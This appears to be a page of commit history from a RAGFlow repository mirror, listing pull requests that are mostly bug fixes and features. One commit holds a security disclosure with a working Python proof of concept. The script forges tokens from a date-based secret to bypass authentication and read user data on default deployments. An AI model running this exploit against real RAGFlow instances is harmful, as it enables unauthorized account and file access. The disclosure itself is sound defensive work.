ragflow

mirror of https://github.com/infiniflow/ragflow.git synced 2025-08-10 17:50:58 +00:00

Author	SHA1	Message	Date
Kevin Hu	aa4a725529	Pref: use redis to check if canceled. (#8853 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 17:19:27 +08:00
Kevin Hu	c642dbefca	Perf: Enhance timeout handling. (#8826 ) ### What problem does this PR solve? ### Type of change - [x] Performance Improvement	2025-07-15 09:36:45 +08:00
Yongteng Lei	237e59532b	Feat: refine create and list operations for MCP dashboard (#8823 ) ### What problem does this PR solve? Refine MCP dashboard create and list operations. ### Type of change - [x] Refactoring	2025-07-14 14:36:56 +08:00
Yongteng Lei	72c19b44c3	Refa: better MIME content type (#8801 ) ### What problem does this PR solve? Better uniform MIME content type. ### Type of change - [x] Refactoring	2025-07-11 18:47:19 +08:00
Yongteng Lei	e8aee8d720	Feat: change document status in bulk (#8777 ) ### What problem does this PR solve? Change document status in bulk. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-11 10:38:59 +08:00
haol	512772c45a	Fix: Resolve typo in /list route function (#8769 ) ### What problem does this PR solve? Fixes a function name typo for the `/list` route in `api/apps/conversation_app.py`. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-10 14:32:28 +08:00
He Wang	cedcd13204	fix: use tenant_id of kb to get index name in rm chunk func (#8760 ) ### What problem does this PR solve? The rm function in chunk_app.py now takes the index name differently than other functions, so there will be situations where users can create and update a chunk but not delete it. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-10 10:30:56 +08:00
Yongteng Lei	c1f6e6f00e	Feat: add advanced document filter (#8723 ) ### What problem does this PR solve? Add advanced document filter ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-09 09:33:11 +08:00
Liu An	addda5ccbe	Fix: Add validation for dialog name (#8722 ) ### What problem does this PR solve? - Validate dialog name in `dialog_app.py` to ensure it is a non-empty string and does not exceed 255 bytes in UTF-8 encoding. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-08 19:20:29 +08:00
Yongteng Lei	4d7bfd2ba3	Fix: typo process_duration (#8696 ) ### What problem does this PR solve? Fix typo process_duration. ### Type of change - [x] Documentation Update - [x] Refactoring	2025-07-07 14:11:47 +08:00
Yongteng Lei	1ac61c0f0f	Fix: secure canvas (#8670 ) ### What problem does this PR solve? Secure canvas access. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-07-04 19:40:39 +08:00
Yongteng Lei	4243330d5c	Feat: add MCP server test endpoint (#8632 ) ### What problem does this PR solve? Add MCP server test endpoint. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-02 18:52:24 +08:00
Liu An	0b40eb3e90	Test: Add tests for chunk API endpoints (#8616 ) ### What problem does this PR solve? - Add comprehensive test suite for chunk operations including: - Test files for create, list, retrieve, update, and delete chunks - Authorization tests - Batch operations tests - Update test configurations and common utilities - Validate `important_kwd` and `question_kwd` fields are lists in chunk_app.py - Reorganize imports and clean up duplicate code ### Type of change - [x] Add test cases	2025-07-02 09:49:08 +08:00
天海蒼灆	d4da6dce6e	Feat: Add file management HTTP_API (#8395 ) ### What problem does this PR solve? Add file management HTTP_API for operating files ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-07-01 09:51:53 +08:00
Yongteng Lei	8801de2772	Refa: change mcp_client module to rag/utils/conn (#8578 ) ### What problem does this PR solve? Change mcp_client module to rag/utils/conn. ### Type of change - [x] Refactoring	2025-07-01 09:29:19 +08:00
Yongteng Lei	0478f36e36	Feat: allow users to choose which MCP tools are enabled (#8519 ) ### What problem does this PR solve? Allow users to choose which MCP tools are enabled. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-27 10:23:34 +08:00
Stephen Hu	7dbe06f7d8	Refactor: remove useless initialize logic in list_doc (#8523 ) ### What problem does this PR solve? Remove useless logic in a loop for list_doc ### Type of change - [x] Refactoring - [x] Performance Improvement	2025-06-27 10:23:08 +08:00
zhanglei	daf6c82066	fix: list index out of range (#8518 ) ### What problem does this PR solve? stack： ``` 2025-06-26 17:22:24,739 ERROR 1609 list index out of range Traceback (most recent call last): File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 880, in full_dispatch_request rv = self.dispatch_request() File "/ragflow/.venv/lib/python3.10/site-packages/flask/app.py", line 865, in dispatch_request return self.ensure_sync(self.view_functions[rule.endpoint])(*view_args) # type: ignore[no-any-return] File "/ragflow/api/utils/api_utils.py", line 298, in decorated_function return func(args, **kwargs) File "/ragflow/api/apps/sdk/session.py", line 472, in list_session print(conv["reference"][message_num]) IndexError: list index out of range ``` ![图片](https://github.com/user-attachments/assets/93fe90a8-0434-4842-ba9f-bb5a995b498a) ### Type of change - [ ] Bug Fix (non-breaking change which fixes an issue) - [ ] New Feature (non-breaking change which adds functionality) - [ ] Documentation Update - [ ] Refactoring - [ ] Performance Improvement - [ ] Other (please describe):	2025-06-27 09:38:33 +08:00
Yongteng Lei	d768130204	Fix: chunk number error after re-parsing (#8513 ) ### What problem does this PR solve? Fix chunk number error after re-parsing. #8503. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:53 +08:00
Liu An	d11cfd4e45	Fix: Add input validation to chunk creation endpoint (#8516 ) ### What problem does this PR solve? - Include optional `tag_feas` field if present in request - Add input validation for `important_kwd` and `question_kwd` to ensure they are lists - #8462 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-26 17:46:00 +08:00
Yongteng Lei	0eb90e73a5	Feat: add MCP dashboard functionalities list_tools and test_tool (#8505 ) ### What problem does this PR solve? Add MCP dashboard functionalities list_tools and test_tool. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-26 13:52:01 +08:00
Liu An	dac5bcdf17	Fix: Enforce default embedding model in create_dataset / update_dataset (#8486 ) ### What problem does this PR solve? Previous: - Defaulted to hardcoded model 'BAAI/bge-large-zh-v1.5@BAAI' - Did not respect user-configured default embedding_model Now: - Correctly prioritizes user-configured default embedding_model Other: - Make embedding_model optional in CreateDatasetReq with proper None handling - Add default embedding model fallback in dataset update when empty - Enhance validation utils to handle None values and string normalization - Update SDK default embedding model to None to match API changes - Adjust related test cases to reflect new validation rules ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-25 16:41:32 +08:00
Yongteng Lei	af6850c8d8	Feat: add MCP dashboard operations (#8460 ) ### What problem does this PR solve? Add MCP server dashboard operations. ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-25 09:26:04 +08:00
Stephen Hu	382d2d0373	Refactor:Improve insert file logic (#8445 ) ### What problem does this PR solve? before refactor 1. create file record 2. Add to blob if have some execption at 2 the system db will have a file record but not have related blob, which will introduce some bug. after refactor 1. add to blob 2. create file record. if 1 success but 2 failed just have a dirty blob in blob system, user will not feel that ### Type of change - [x] Refactoring	2025-06-24 13:17:22 +08:00
Song Fuchang	fd7ac17605	Feat: Scratch MCP tool calling support. (#8263 ) ### What problem does this PR solve? This is a cherry-pick from #7781 as requested. ### Type of change - [x] New Feature (non-breaking change which adds functionality) Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-23 17:45:35 +08:00
Yongteng Lei	936a91c5fe	Fix: code debug may corrupt by history answer (#8385 ) ### What problem does this PR solve? Fix code debug may corrupt by history answer. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-20 14:23:02 +08:00
Liu An	9077ee8d15	Fix: desc parameter parsing (#8362 ) ### What problem does this PR solve? - Correct boolean parsing for 'desc' parameter in document_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 14:22:56 +08:00
RyanFernandes23	c8b1790c92	Fix typo in dataset name length error message (#8351 ) ### What problem does this PR solve? Fixes a minor grammar issue in a user-facing error message. The original message said "large than" instead of the correct comparative form "larger than". Just a quick fix I noticed while reading the code. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-19 09:54:30 +08:00
Yongteng Lei	1b022116d5	Feat: wrap search app (#8320 ) ### What problem does this PR solve? Wrap search app ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-18 16:45:42 +08:00
Liu An	0a13d79b94	Refa: Implement centralized file name length limit using FILE_NAME_LEN_LIMIT constant (#8318 ) ### What problem does this PR solve? - Replace hardcoded 255-byte file name length checks with FILE_NAME_LEN_LIMIT constant - Update error messages to show the actual limit value - #8290 ### Type of change - [x] Refactoring Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>	2025-06-17 18:01:30 +08:00
Liu An	64e281b398	Fix: Add validation for empty filenames in document_app.py (#8321 ) ### What problem does this PR solve? - Add validation for empty filenames in document_app.py and trim whitespace ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-17 15:53:41 +08:00
Liu An	a3bebeb599	Fix: Enforce 255-byte filename limit (#8290 ) ### What problem does this PR solve? - Add filename length validation (<=255 bytes) for document upload/rename in both HTTP and SDK APIs - Update error messages for consistency - Fix comparison operator in SDK from '>=' to '>' for filename length check ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-16 16:39:41 +08:00
Kevin Hu	f7074037ef	Feat: Let number of task ahead be visible. (#8259 ) ### What problem does this PR solve? ![image](https://github.com/user-attachments/assets/d4ef0526-343a-426f-a85a-b05eb8b559a1) ### Type of change - [x] New Feature (non-breaking change which adds functionality)	2025-06-13 17:32:40 +08:00
Liu An	99725444f1	Fix: desc parameter parsing (#8229 ) ### What problem does this PR solve? - Fix boolean parsing for 'desc' parameter in kb_app.py to properly handle string values ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 19:17:47 +08:00
Liu An	7fbbc9650d	Fix: Move pagerank field from create to update dataset API (#8217 ) ### What problem does this PR solve? - Remove pagerank from CreateDatasetReq and add to UpdateDatasetReq - Add pagerank update logic in dataset update endpoint - Update API documentation to reflect changes - Modify related test cases and SDK references #8208 This change makes pagerank a mutable property that can only be set after dataset creation, and only when using elasticsearch as the doc engine. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:49 +08:00
Liu An	d0c5ff04a6	Fix: Add pagerank validation for non-elasticsearch doc engines (#8215 ) ### What problem does this PR solve? Validate that pagerank updates are only allowed when using elasticsearch as the document engine. Return an error if pagerank is set while using a different doc engine, preventing potential inconsistencies in document scoring. #8208 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 15:47:22 +08:00
Liu An	cef587abc2	Fix: Add validation for dataset name in KB update API (#8194 ) ### What problem does this PR solve? Validate dataset name in knowledge base update endpoint to ensure: - Name is a non-empty string - Name length doesn't exceed DATASET_NAME_LIMIT - Whitespace is trimmed before processing Prevents invalid dataset names from being saved and provides clear error messages. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 11:37:25 +08:00
Liu An	60c1bf5a19	Fix: duplicate knowledgebase name validation logic (#8199 ) ### What problem does this PR solve? Change the condition from checking for >1 to >=1 when validating duplicate knowledgebase names to properly catch all duplicates. This ensures no two knowledgebases can have the same name for a tenant. ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-12 09:46:57 +08:00
Liu An	e87ad8126c	Fix: Improve dataset name validation in KB app (#8188 ) ### What problem does this PR solve? - Trim whitespace before checking for empty dataset names - Change length check from >= to > DATASET_NAME_LIMIT for consistency ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-11 16:14:29 +08:00
Stephen Hu	e6f68e1ccf	Fix: When List Kbs some times the total is wrong (#8151 ) ### What problem does this PR solve? for kb.app list method when owner_ids the total calculate is wrong (now will base on the paged result to calculate total) ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 11:34:30 +08:00
yurhett	9c6c6c51e0	Fix: use jwks_uri from OIDC metadata for JWKS client (#8136 ) ### What problem does this PR solve? Issue: #8051 The current implementation assumes JWKS endpoints follow the standard `/.well-known/jwks.json` convention. This breaks authentication for OIDC providers that use non-standard JWKS paths, resulting in 404 errors during token validation. Root Cause Analysis - The OpenID Connect specification doesn't mandate a fixed path for JWKS endpoints - Some identity providers (like certain Keycloak configurations) use custom endpoints - Our previous approach constructed JWKS URLs by convention rather than discovery ### Solution Approach Instead of constructing JWKS URLs by appending to the issuer URI, we now: 1. Properly leverage the `jwks_uri` from the OIDC discovery metadata 2. Honor the identity provider's actual configured endpoint ```python # Before (fragile approach) jwks_url = f"{self.issuer}/.well-known/jwks.json" # After (standards-compliant) jwks_cli = jwt.PyJWKClient(self.jwks_uri) # Use discovered endpoint ``` ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-10 10:16:58 +08:00
Liu An	968ffc7ef3	Refa: dataset operations to simplify error handling (#8132 ) ### What problem does this PR solve? - Consolidate database operations within single try-except blocks in the methods ### Type of change - [x] Refactoring	2025-06-09 13:29:56 +08:00
Liu An	8b7c424617	Fix: Document.update() now refreshes object data (#8068 ) ### What problem does this PR solve? #8067 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 12:46:29 +08:00
Gecko Security	de89b84661	Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998 ) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis Source (User Input): HTTP Authorization header containing attacker-controlled JWT token Flow Path: 1. Entry Point: `load_user()` function in `api/apps/__init__.py` (Line 142) 2. Token Processing: JWT token extracted from Authorization header 3. Secret Key Usage: Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. Database Query: `UserService.query()` called with decoded empty access_token 5. Sink: Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` Exploitation Steps: 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials Version: 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty <amalyshau2002@gmail.com>	2025-06-05 12:10:24 +08:00
Liu An	ab5e3ded68	Fix: DataSet.update() now refreshes object data (#8058 ) ### What problem does this PR solve? #8057 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-05 09:26:19 +08:00
Stephen Hu	b832372c98	Fix: /v1/conversation/completion KeyError: 'conversation_id' (#8037 ) ### What problem does this PR solve? Close #8033 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-04 10:18:14 +08:00
Kevin Hu	b6f1cd7809	Fix: no kb selected for an assistant. (#8021 ) ### What problem does this PR solve? ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 17:42:16 +08:00
Liu An	e64da8b2aa	Fix: sdk can not update chat model (#8016 ) ### What problem does this PR solve? #7791 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-06-03 15:22:26 +08:00
Jin Hai	31f4d44c73	Update upload filename length limit from 128 to 256, which is aligned with os (#7971 ) ### What problem does this PR solve? Change filename length limit from 128 to 256 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue) Signed-off-by: Jin Hai <haijin.chn@gmail.com>	2025-05-30 14:25:59 +08:00
Stephen Hu	62611809e0	Fix: Add user_id when create Conversation (#7960 ) ### What problem does this PR solve? https://github.com/infiniflow/ragflow/issues/7940 ### Type of change - [x] Bug Fix (non-breaking change which fixes an issue)	2025-05-30 13:11:41 +08:00

1 2 3 4 5 ...

615 Commits